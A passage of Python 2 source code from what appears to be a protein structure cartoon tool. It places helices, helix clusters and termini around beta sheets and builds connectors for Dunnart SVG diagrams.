left_xpos,right_xpos) }
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neihbouring sheets, if the
total helix length is above a threshold.
Return value:
tuple (xpos, ypos) to place the helix at
"""
# position the helix near the sheet seq_strand is in
# according to position map for relative position and tableau
# for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(seq_strand.get_sheet_id(),
helix)
if enable_sheet_gap_rule:
sheet_id = seq_strand.get_sheet_id()
if sheet_posmap.has_key(sheet_id):
# don't positino the helices where they would
# get between neighbouring sheets, place them
# where there is nothing beside the sheet if possible
sheet_neighbours = sheet_posmap[sheet_id]
if (sheet_neighbours.get_neighbour(relpos) != None):
if verbose:
sys.stderr.write('sheet gap rule: cannot place ' +
str(helix) + ' ' +
ptrelpos_to_str(relpos) + ' ' +
'sheet ' + sheet_id + '\n')
# FIXME: arbitrary helix positioning here
if (sheet_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (sheet_neighbours.south == None):
relpos = RELPOS_BELOW
elif (sheet_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (sheet_neighbours.west == None):
relpos = RELPOS_LEFT
else:
sys.stderr.write('WARNING: nowhere to place ' +
str(helix) + ' relative to sheet '
+ sheet_id + ' (sheet gap rule)\n')
# FIXME: need to do something about this...
if verbose:
sys.stderr.write(' sheet gap rule: placing ' +
str(helix) + ' ' +
ptrelpos_to_str(relpos) + ' of '
'sheet ' + sheet_id + '\n')
(xpos, ypos) = self.relpos_to_pos(seq_strand.get_sheet_id(),
helix,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
return (xpos, ypos)
def build_helices_svg(self, sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers=False):
"""
Build SVG for helices and n- and c- terminus nodes.
Called by build_dunnart_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
sheet_posmap - The PTPosMap of sheet neighbour relationships
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neihbouring sheets, if the
total helix length is above a threshold.
use_helix_clustering - If True and using heuristic
helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'.
Only needed because in simple scheme need to color
helices in clusters specially, but don't know about
helix clusters until build_helices_heuristic().
interdomain_connectirs - make connectors between domains rather
than using pseudo-terminus nodes as normally used
(such as when one domain per file).
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned flag in helices though)
include_pi_helices, include_310_helices - flags to include or not
(write):
helix_cluster_id_generator (initialized here)
Return value:
None
"""
# NOTE: horiz/vert and x/y and height/width, top/bot
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
# un-reversed normally is pointing 'up' (reversed is down)
# un-reversed when sideways is pointing 'left' (reversed is right)
# dictionary mapping strand id to current y position of other nodes
# (helices) on the vertical axis (indguide) of that strand.
# Use to keep track of y co-ordinate to give helices when there
# are multiple positioned above/below the strand
# { nodeid : (ypos_above, ypos_below, sideways,
# num_helices_aligned_above, num_helices_aligned_below) }
# e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
# Note there is ypos_above and ypos_below the strand may have
# helices before and after (above and below, or below and above,
# respecitvely, dpeending if the strand is reversed or not) and
# so we need to keep track of both of them seperately.
strand_ypos_dict = {}
# number helix clusters (if any) starting from 1
self.helix_cluster_id_generator = GenSeqId(1)
# set up the strand_ypos_dict for use in positioning helices
# below
for strand in self.iter_strands():
assert(isinstance(strand, PTNodeStrand))
nnodeid = strand.nodeid
sheet_id = strand.get_sheet_id()
if strand.get_sideways():
ypos_above = sheet_pos_dict[sheet_id][2] - get_min_gap_size()
ypos_below = sheet_pos_dict[sheet_id][3] + get_min_gap_size()
sideways = True
else:
ypos_above = sheet_pos_dict[sheet_id][0] - get_min_gap_size()
ypos_below = sheet_pos_dict[sheet_id][1] + get_min_gap_size()
sideways = False
strand_ypos_dict[nnodeid] = (ypos_above, ypos_below, sideways,
0, 0)
unpositioned_termini = [] # list of tuples (node, nodelist)
unpositioned_helices = [] # list of tuples (node, seq_strand)
unpositioned_helix_clusters = [] # list of tuples ([list of helices in
# cluster], seq_strand, seqpos)
for nodelist in self.iter_chains():
node_index = 0
while node_index < len(nodelist):
node = nodelist[node_index]
if not isinstance(node, PTNodeHelix) and \
not isinstance(node, PTNodeTerminus):
node_index += 1
continue # only helices and termini handled here
if isinstance(node, PTNodeHelix) and node.get_is_positioned():
node_index += 1
continue # this helix has already been written
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
node_index += 1
continue # a 310 or pi helix and we're not drawing them
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
node_index += 1
continue # not drawing pseudo-termini
node_index = \
self.build_helices_heuristic(
sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
strand_ypos_dict,
unpositioned_termini,
unpositioned_helices,
unpositioned_helix_clusters,
nodelist,
node_index,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers)
# END of while loop over nodelist
# END of iteration over chains
# process any helices that could not be positioned earlier, now
# by using the distance matrix placement algorithm (for unpositioned
# helices) or helix clustering algorithm (for unpositioned helix
# clusters)
# first do the unpositioned helices not in a cluster
for (helix, seq_strand) in unpositioned_helices:
(xpos, ypos) = self.find_helix_xypos(helix, seq_strand,
sheet_posmap,
sheet_pos_dict,
enable_sheet_gap_rule)
self.set_helix_svginfo(helix,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
# now do the unpositioned helix clusters
for (helix_cluster_list, seq_strand, seqpos) in \
unpositioned_helix_clusters:
clusterid = self.helix_cluster_id_generator.next()
for helix in helix_cluster_list:
helix.set_cluster_id(clusterid)
self.build_helix_cluster(sse_label_scheme,
seqnum_dict,
strand_ypos_dict,
seq_strand,
seqpos,
helix_cluster_list,
clusterid,
helix_cluster_shading_color,
sheet_posmap,
sheet_pos_dict,
label_residue_numbers)
# and now process any termini nodes that we could not position earlier
for (termnode, nodelist) in unpositioned_termini:
if ( interdomain_connectors and termnode.get_pseudo() ):
continue # not drawing pseudo-termini
(node_xpos, node_ypos) = self.find_terminus_pos(termnode,
nodelist)
self.set_terminus_svginfo(termnode,
node_xpos, node_ypos)
def build_helices_heuristic(self,
sheet_pos_dict,
sse_label_scheme,
seqnum_dict, sheet_posmap,
enable_sheet_gap_rule,
strand_ypos_dict,
unpositioned_termini,
unpositioned_helices,
unpositioned_helix_clusters,
nodelist,
node_index,
use_helix_clustering,
helix_cluster_shading_color,
color_scheme,
interdomain_connectors,
label_residue_numbers = False):
"""
Build SVG for helices and n- and c- terminus nodes for a single chain.
Called by build_helices_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is'sequential'
sheet_posmap - The PTPosMap of sheet neighbour relationships
enable_sheet_gap_rule - If True, don't align helices on strand
indguides between neihbouring sheets, if the
total helix length is above a threshold.
strand_pos_dict - (IN/OUT)
The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
unpositioned_termini - (IN/OUT) list of tuples
(node, nodelist)
unpositioned_helices - (IN/OUT) list of tuples (node, seq_strand)
unpositioned_helix_cluster - (IN/OUT) list of ([list of helices in
helix cluster], seq_strand, seqpos)
nodelist - list of nodes in chain to process
node_index - index of the current node to process in the nodelist
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
color_scheme: 'none', 'simple', 'gradient', 'sheet', 'fold'.
Only needed because in simple scheme need to color
helices in clusters specially, but don't know about
helix clusters until build_helices_heuristic().
interdomain_connectors - If True, do NOT make pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned flag, cluster_id in helices though)
include_pi_helices, include_310_helices - flags to include or not
(read/write):
helix_cluster_dict - dict { clusterid : PTSVGCluster)
helix_cluster_id_generator
xmlid_generator
Return value:
node_index where
node_index is the index of the next node in the nodelist to be
processed (index for while loop over nodelist in build_helices_svg())
"""
# if total length of helices on an axis between two sheets is
# greater than this then do not position the helices there,
# instead place them later using distance matrix method
SHEET_GAP_HELIX_LEN = 10 # 10 means ANY helix is long enough
# when using helix 'clustering' this is the minimum number
# helices required to make a cluster rather than just align
# on indguide.
MIN_HELIX_CLUSTER_SIZE = 2
node = nodelist[node_index]
# position nodes near (above or below) the sheet they
# 'belong to' nodes after a normal (not reversed, so
# 'pointing up') strand go below sheet if before
# strand in seq, and above sheet if after strand in
# seq. If strand is reversed, so is this, ie. below
# sheet if after in seq, above if before.
(sheet_id, nterm_strand_index, cterm_strand_index) = \
self.immediate_containing_sheet(node_index,
node.get_chainid())
nterm_strand = None
cterm_strand = None
if nterm_strand_index != None or cterm_strand_index != None:
seqpos = None
if cterm_strand_index == None:
nterm_strand = nodelist[nterm_strand_index]
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif nterm_strand_index == None:
cterm_strand = nodelist[cterm_strand_index]
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
else:
# we have a choice between the axis on which the
# n-terminal or c-terminal strand is aligned.
# Choose one with no helices already aligned on it,
# if possible
# but first check (even if enable_sheet_gap_rule not True)
# if it would be a 'sheet gap' helix in one position and
# not the other, and choose the one in which it isn't if
# possible.
nterm_strand = nodelist[nterm_strand_index]
cterm_strand = nodelist[cterm_strand_index]
(num_helices_above_nterm_strand,
num_helices_below_nterm_strand) = \
self.count_helices_on_strand_axis(nterm_strand,
strand_ypos_dict)
(num_helices_above_cterm_strand,
num_helices_below_cterm_strand) = \
self.count_helices_on_strand_axis(cterm_strand,
strand_ypos_dict)
seqpossg = SEQPOS_AFTER
if nterm_strand.get_reversed():
if seqpossg == SEQPOS_AFTER:
seqpossg = SEQPOS_BEFORE
else:
seqpossg = SEQPOS_AFTER
nterm_is_sheet_gap = self.helix_is_sheet_gap(node, nterm_strand,
cterm_strand,
seqpossg,
nterm_strand,
sheet_posmap)
seqpossg = SEQPOS_BEFORE
if cterm_strand.get_reversed():
if seqpossg == SEQPOS_AFTER:
seqpossg = SEQPOS_BEFORE
else:
seqpossg = SEQPOS_AFTER
cterm_is_sheet_gap = self.helix_is_sheet_gap(node, nterm_strand,
cterm_strand,
seqpossg,
cterm_strand,
sheet_posmap)
# print 'xxx',str(node),'nterm',nterm_is_sheet_gap,'cterm',cterm_is_sheet_gap
if (nterm_is_sheet_gap and not cterm_is_sheet_gap):
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
elif (cterm_is_sheet_gap and not nterm_is_sheet_gap):
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif ( (not nterm_strand.get_reversed() and
num_helices_above_nterm_strand == 0) or
(nterm_strand.get_reversed() and
num_helices_below_nterm_strand == 0) ):
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif ( (not cterm_strand.get_reversed() and
num_helices_below_cterm_strand == 0) or
(cterm_strand.get_reversed and
num_helices_above_cterm_strand == 0) ):
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
else:
#use closest strand in sequence (n-terminal if tied)
nterm_dist = node_index - nterm_strand_index
cterm_dist = cterm_strand_index - node_index
assert(nterm_dist > 0)
assert(cterm_dist > 0)
if cterm_dist < nterm_dist:
seq_strand = nodelist[cterm_strand_index]
seqpos = SEQPOS_BEFORE
else:
seq_strand = nodelist[nterm_strand_index]
seqpos = SEQPOS_AFTER
if seq_strand.get_reversed():
if seqpos == SEQPOS_AFTER:
seqpos = SEQPOS_BEFORE
else:
seqpos = SEQPOS_AFTER
# for multiple helices adjacent in sequence, process them
# all in the same way in an inner loop here.
# We do this by making a new list of only these adjacent
# helices (maybe with terminus), so that we can
# reverse it if necessary.
helix_list = []
while not isinstance(node, PTNodeStrand): # always at least once
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
node_index += 1
if node_index >= len(nodelist):
break
node = nodelist[node_index]
continue # 310 or pi helix & we're not drawing them
if not node.get_is_positioned():
helix_list.append(node)
node_index += 1
if node_index >= len(nodelist):
break
node = nodelist[node_index]
is_helix_cluster = False
if use_helix_clustering:
helix_cluster_list = [ helix for helix in helix_list
if isinstance(helix, PTNodeHelix) ]
if len(helix_cluster_list) > MIN_HELIX_CLUSTER_SIZE:
is_helix_cluster = True
# if the list of helices would be between two sheets
# and is long enough that we don't want it to get in
# the way there, then put them on unpositioned list
# to be positioned by distance matrix method later instead.
total_helix_len = sum([helix.get_span() for helix in
helix_list if
isinstance(helix, PTNodeHelix)]) * \
DUNNART_HELIX_SPAN_FACTOR
if (enable_sheet_gap_rule and
total_helix_len > SHEET_GAP_HELIX_LEN and
self.helix_is_sheet_gap(helix_list[0], nterm_strand,
cterm_strand, seqpos,
seq_strand, sheet_posmap,
is_helix_cluster)):
if verbose:
sys.stderr.write('intersheet helices: ' +
str([str(helix) for helix in helix_list]) +
'\n')
if is_helix_cluster:
unpositioned_helix_clusters.append((helix_cluster_list,
seq_strand,
None)) # no seqpos
for tnode in [tn for tn in helix_list if
isinstance(tn, PTNodeTerminus)]:
unpositioned_termini.append((tnode, nodelist))
else:
for node in helix_list:
if isinstance(node, PTNodeHelix):
unpositioned_helices.append((node, seq_strand))
# FIXME: should change the name of the
# is_interstrand flag now it is used here
# also.
node.set_is_interstrand(True)
elif isinstance(node, PTNodeTerminus):
unpositioned_termini.append((node, nodelist))
else:
assert(False)
# node_index already incremented in loop building
# helix_list, so don't need to increment it to continue
return node_index # we do not write this one now
# reverse the list if it is below an upwards (non-reversed)
# strand that is after (c-terminal to) it
# or vice versa (reversed strand n-terminal to it)
if seqpos == SEQPOS_BEFORE and not seq_strand.get_reversed() or\
seqpos == SEQPOS_AFTER and seq_strand.get_reversed():
helix_list.reverse()
if ( isinstance(helix_list[-1], PTNodeHelix) and
(self.pdb_resid_dict[(seq_strand.get_chainid(),
seq_strand.get_start_res_seq())] >
self.pdb_resid_dict[(helix_list[-1].get_chainid(),
helix_list[-1].get_start_res_seq())]) ):
# aligned on C-terminal strand, set last in list flag
helix_list[-1].set_is_last_in_seq(True)
helix_list[-1].set_reversed(seq_strand.get_reversed())
if is_helix_cluster:
# just put helix clusters on a list to process after all
# aligned helices are processed, since we need the aligned
# helices there to see if helix clusters would overlap
# with them.
unpositioned_helix_clusters.append((helix_cluster_list,
seq_strand,
seqpos))
for tnode in [tn for tn in helix_list if
isinstance(tn, PTNodeTerminus)]:
unpositioned_termini.append((tnode, nodelist))
else:
for node in helix_list:
if isinstance(node, PTNodeHelix):
height = node.get_span() * DUNNART_HELIX_SPAN_FACTOR
width = DUNNART_HELIX_WIDTH
node.set_reversed(seq_strand.get_reversed())
elif isinstance(node, PTNodeTerminus):
width = DUNNART_TERMINUS_SIZE
height = DUNNART_TERMINUS_SIZE
else:
assert(False)
(ypos_above, ypos_below,sideways,
num_helices_aligned_above,
num_helices_aligned_below)= \
strand_ypos_dict[seq_strand.nodeid]
if sideways:
temp = height
height = width
width = temp
helix_extent = width
node.set_sideways(True)
node_ypos = seq_strand.ypos
else:
node_xpos = seq_strand.xpos
helix_extent = height
offset = get_min_gap_size()
if seqpos == SEQPOS_AFTER:
if sideways:
node_xpos = ypos_above - offset - helix_extent
new_above_pos = node_xpos
else:
node_ypos = ypos_above - offset - helix_extent
new_above_pos = node_ypos
strand_ypos_dict[seq_strand.nodeid] = \
(new_above_pos, ypos_below, sideways,
num_helices_aligned_above + 1,
num_helices_aligned_below)
else:
if sideways:
node_xpos = ypos_below + offset
new_below_pos = node_xpos + helix_extent
else:
node_ypos = ypos_below + offset
new_below_pos = node_ypos + helix_extent
strand_ypos_dict[seq_strand.nodeid] = \
(ypos_above, new_below_pos, sideways,
num_helices_aligned_above,
num_helices_aligned_below + 1)
if isinstance(node, PTNodeHelix):
self.set_helix_svginfo(node,
node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
elif isinstance(node, PTNodeTerminus):
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and
node.get_pseudo() ):
node_index += 1
continue # not drawing pseudo-termini
else:
self.set_terminus_svginfo(node,
node_xpos, node_ypos)
else:
assert(False)
# Also for helices (and termini)
# that are just before or after strand in sequence,
# put them on the vert indguide for that strand
if sideways:
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(seq_strand.indguide,
node,
align_type))
# END of inner (for) loop over adjacent helices in helix_list
# END of else case (not using helix clustering)
else: # of nterm_strand_index != None or cterm_strand_index != None:
if isinstance(node, PTNodeHelix):
# no strand in this chain so we can't position helix
# on a strand indguide - we will use the distance
# matrix placement method instead:
# find the sheet closest to this helix
# (there must be some sheet already placed (in another
# chain(s)) otherwise the -i option (distance matrix
# method) would have been forced on and we wouldn't
# be in this subroutine.
(closest_sheetid, unused_dist) = \
self.distmatrix.get_min_distance_objid(node.nodeid,
Set(),
sheets_only=True)
if verbose:
sys.stderr.write('positioning ' + str(node) +
' relative to ' +
'sheet ' + closest_sheetid +
'\n')
# position the element near its closest already
# positioned one according to position map for
# relative position and tableau for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(closest_sheetid,
node)
(node_xpos, node_ypos) = \
self.relpos_to_pos(closest_sheetid,
node,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
self.set_helix_svginfo(node,
node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
node_index += 1 # needed to continue loop in calling routine
elif isinstance(node, PTNodeTerminus):
# add these to a list to process later, since we
# want to place all helices first to ensure we
# always have a real SSE to place terminus near to
unpositioned_termini.append((node, nodelist))
node_index += 1 # needed to conintue loop
return node_index # we do not write this one now
else:
assert(False)
return node_index
def build_helix_cluster(self,
sse_label_scheme,
seqnum_dict,
strand_ypos_dict,
seq_strand,
seqpos,
helix_list,
helix_cluster_id,
helix_cluster_shading_color,
sheet_posmap = None,
sheet_pos_dict = None,
label_residue_numbers = False):
"""
Build a 'cluster' of helices that are in sequence between two
strands. Called by build_helices_heuristic().
Parameters:
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
strand_ypos_dict - (IN/OUT)
The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
seq_strand - The PTNodeStrand that first helix is list
is closest in sequence to, used to align that helix.
seqpos - SEQPOS_AFTER or _BEFORE as calculted
in build_helices_svg()
or None if we cannot place cluster aligned on strand
(due to helix sheet gap rule), in which case
we place it using distance matrix placement.
helix_list - list of helices in chain to process
helix_cluster_id - integer id for this helix cluster
helix_cluster_shading_color -color to shade the helix cluster
sheet_posmap - The PTPosMap of sheet neighbour relationships
Only used if seqpos==None. Default None.
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
Only used if seqpos==None. Default None.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned, is_interstrand flag in helices though)
(write):
helix_cluster_list - list of SVGCluster
helix_cluster_dict - maps clutser id to SVGCluster object
svg_constraint_list
Return value:
None
"""
assert(seqpos in [None, SEQPOS_AFTER, SEQPOS_BEFORE])
assert(len(helix_list) > 0)
if not self.room_for_helix_cluster(seq_strand, seqpos,
strand_ypos_dict):
if verbose:
sys.stderr.write('no room for helix cluster ' + str([str(h) for h in helix_list]) + '\n')
seqpos = None # force distance matrix placement not strand alignment
node = helix_list[0]
height = node.get_span() * DUNNART_HELIX_SPAN_FACTOR
width = DUNNART_HELIX_WIDTH
(ypos_above, ypos_below,sideways,
num_helices_aligned_above,
num_helices_aligned_below)= \
strand_ypos_dict[seq_strand.nodeid]
if sideways:
temp = height
height = width
width = temp
helix_extent = width
node.set_sideways(True)
node_ypos = seq_strand.ypos
else:
node_xpos = seq_strand.xpos
helix_extent = height
offset = get_min_gap_size()
if seqpos == None:
(node_xpos,node_ypos) = self.find_helix_xypos(node, seq_strand,
sheet_posmap,
sheet_pos_dict,
True) # sheet gap
elif seqpos == SEQPOS_AFTER:
if sideways:
node_xpos = ypos_above - offset - helix_extent
new_above_pos = node_xpos
else:
node_ypos = ypos_above - offset - helix_extent
new_above_pos = node_ypos
strand_ypos_dict[seq_strand.nodeid] = \
(new_above_pos, ypos_below, sideways,
num_helices_aligned_above + 1,
num_helices_aligned_below)
else: # SEQPOS_BEFORE
if sideways:
node_xpos = ypos_below + offset
new_below_pos = node_xpos + helix_extent
else:
node_ypos = ypos_below + offset
new_below_pos = node_ypos + helix_extent
strand_ypos_dict[seq_strand.nodeid] = \
(ypos_above, new_below_pos, sideways,
num_helices_aligned_above,
num_helices_aligned_below + 1)
node.set_is_interstrand(True) # FIXME: should change name of this flag
self.set_helix_svginfo(node, node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,label_residue_numbers)
# Put the first helix on the list, ie the one that
# that is just before or after strand in sequence,
# on the vert indguide for that strand
# Unless seqpos=None indicating helix cannot aligned on strand
# due to helix sheet gap rule
if seqpos != None:
if sideways:
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(seq_strand.indguide,
node,
align_type))
# Now position the rest of the helices using the distance matrix
# and tableau
# dict { PTNodeHelix : PTNodeStrand } mapping, for a positinoed helix,
# the strand used as as the reference to position it on its axis
helix_refstrand_dict = {}
positioned_elements = Set([node])
unpositioned_elements = Set(helix_list[1:])
# print 'xxx',str([str(node) for node in unpositioned_elements])
firsthelix = True
while (len(unpositioned_elements) > 0):
# find nearest element to any already positioned element in cluster
(positioned_element, cur_element, dist_unused) = \
self.distmatrix.find_nearest_sses_in_sets( \
positioned_elements,
unpositioned_elements)
if verbose:
sys.stderr.write('build_helix_cluster positioning ' +
str(cur_element) +
' relative to ' +
str(positioned_element) + '\n')
# position the element near its closest already positioned one
# according to position map for relative position and tableau
# for orientation
if firsthelix:
ref_strand = seq_strand
helix_refstrand_dict[positioned_element] = seq_strand
firsthelix = False
else:
ref_strand = helix_refstrand_dict[positioned_element]
(relpos, test_strand) = \
self.ptrelpos.get_helixcluster_relative_position(
positioned_element,
cur_element,
ref_strand)
helix_refstrand_dict[cur_element] = test_strand
assert(isinstance(cur_element, PTNodeHelix))
cur_element.set_is_interstrand(True) # FIXME: change name of flag
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
None, None,
sheet_pos_dict=None)
self.set_helix_svginfo(cur_element,
xpos, ypos,
sse_label_scheme,
seqnum_dict,label_residue_numbers)
positioned_elements.add(cur_element)
unpositioned_elements.remove(cur_element)
shading_color = get_color_list(helix_cluster_shading_color)[0] +\
DUNNART_CLUSTER_ALPHA_HEX
helixcluster = PTSVGCluster(helix_list,
self.xmlid_generator.next(),
str(helix_cluster_id),
0, # color_num used for proximity grouping
shading_color)
self.helix_cluster_list.append(helixcluster)
self.helix_cluster_dict[helix_cluster_id] = helixcluster
if verbose:
sys.stderr.write('build_helix_cluster: helices ' +
str([str(helix) for helix in helix_list]) +
'are in cluster ' + str(helix_cluster_id) + '\n')
def build_connectors_aligned_svg(self, nodelist,
chain_i,
use_connector_arrowheads=False,
connector_color_scheme = 'all',
interdomain_connectors = False):
"""
Called by build_dunnart_svg() to
build SVG for connectors for sequence in a single chain:
a connector between each
node (helix/strand) in sequence order.
This is the original version for use with herustic helix
placement (ie no -i option) along with build_helices_svg(). It puts
connectors on ports of helices simply to try to avoid
unnecessary crossings assuming they are aligned in order along
strand axes, ignoring any tableau orientation they are
supposed to have.
Parameters:
nodelist - list of nodes in this chain
chain_i - chain index (0,1,...) for selecting line color
use_connector_arrowheads - If True make connectors directed.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
interdomain_connectors - If True, do NOT make
pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
Uses data members (readonly):
node_list - ordered list of nodes (NB sets port fields in SVGNodes)
include_pi_helices, include_310_helices
Return value:
the new current XML id
Precondition: nodelist is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
prevnode = None
prevdstFlags = None
for nodeindex in range(len(nodelist)):
node = nodelist[nodeindex]
if isinstance(node, PTNodeHelix):
if ( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ):
continue # skip 310/pi helix if flagged to not draw
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
continue # don't do pseudo for interdomain
if prevnode != None:
# add connector from prevnode to node
if isinstance(node, PTNodeStrand):
dst_reversed = node.get_reversed()
else:
dst_reversed = False
if dst_reversed:
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
if prevdstFlags == None:
if isinstance(prevnode, PTNodeStrand):
src_reversed = prevnode.get_reversed()
else:
src_reversed = False
if src_reversed:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
else:
if prevdstFlags == DUNNART_TOP_PORT or \
prevdstFlags == DUNNART_LEFT_PORT:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
if isinstance(node, PTNodeHelix):
if node.get_sideways():
prevnode_ypos = prevnode.xpos # x coord
node_ypos = node.xpos # x coord
else:
prevnode_ypos = prevnode.ypos # y coord
node_ypos = node.ypos # y coord
if node.get_is_interstrand():
# special case for helices between strands on same
# axis in sheet
if node.get_reversed(): # N-term strand reversed value
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
elif node.get_is_last_in_seq():
if node.get_reversed(): # axis strand reversed value
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
else:
if prevnode_ypos < node_ypos:
dstFlags = DUNNART_TOP_PORT
prevdstFlags = dstFlags
if not isinstance(node, PTNodeStrand):
srcFlags = DUNNART_BOTTOM_PORT
if node.get_sideways():
if dstFlags == DUNNART_TOP_PORT:
dstFlags = DUNNART_LEFT_PORT
else:
dstFlags = DUNNART_RIGHT_PORT
if prevnode.get_sideways():
if srcFlags == DUNNART_TOP_PORT:
srcFlags = DUNNART_LEFT_PORT
else:
srcFlags = DUNNART_RIGHT_PORT
if isinstance(node, PTNodeTerminus):
dstFlags = DUNNART_DEFAULT_PORT
elif isinstance(prevnode, PTNodeTerminus):
srcFlags = DUNNART_DEFAULT_PORT
# line color may be overwritten later for multidomain
linecolor = get_line_color(connector_color_scheme, chain_i)
node.nterm_port = dstFlags
prevnode.cterm_port = srcFlags
xmlid = self.xmlid_generator.next()
self.svg_connector_list.append(
PTSVGConnector(xmlid, prevnode, node, srcFlags, dstFlags,
linecolor, use_connector_arrowheads))
prevdstFlags = dstFlags
prevnode = node
def set_helix_cluster_colors(self, helix_proximity_shading_colors,
helix_cluster_shading_color):
"""
Set shading colors for helix clusters.
Color nearby helix clusters
the same shading color. Note that this may involve
making some helices a one-helix 'cluster'.
Called by build_dunanrt_svg().
Parameters:
helix_proximity_shading_colors - shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
helix_cluster_shading_color - default color to shade helix clusters
Uses data members (read/write):
helix_cluster_id_generator
helix_cluster_list
helix_cluster_dict
helix_cluster_dict - dict { clusterid : PTSVGCluster)
xmlid_generator
Return value:
None
"""
assert(helix_proximity_shading_colors != None)
num_clusters = len(self.helix_cluster_list)
if num_clusters < 1:
return
cluster_fill_colors = get_cluster_fill_colors(
helix_proximity_shading_colors,
num_clusters)
if helix_proximity_shading_colors != 'auto':
# put standard (-k) cluster fill color at 0 for nonassigned to gourp
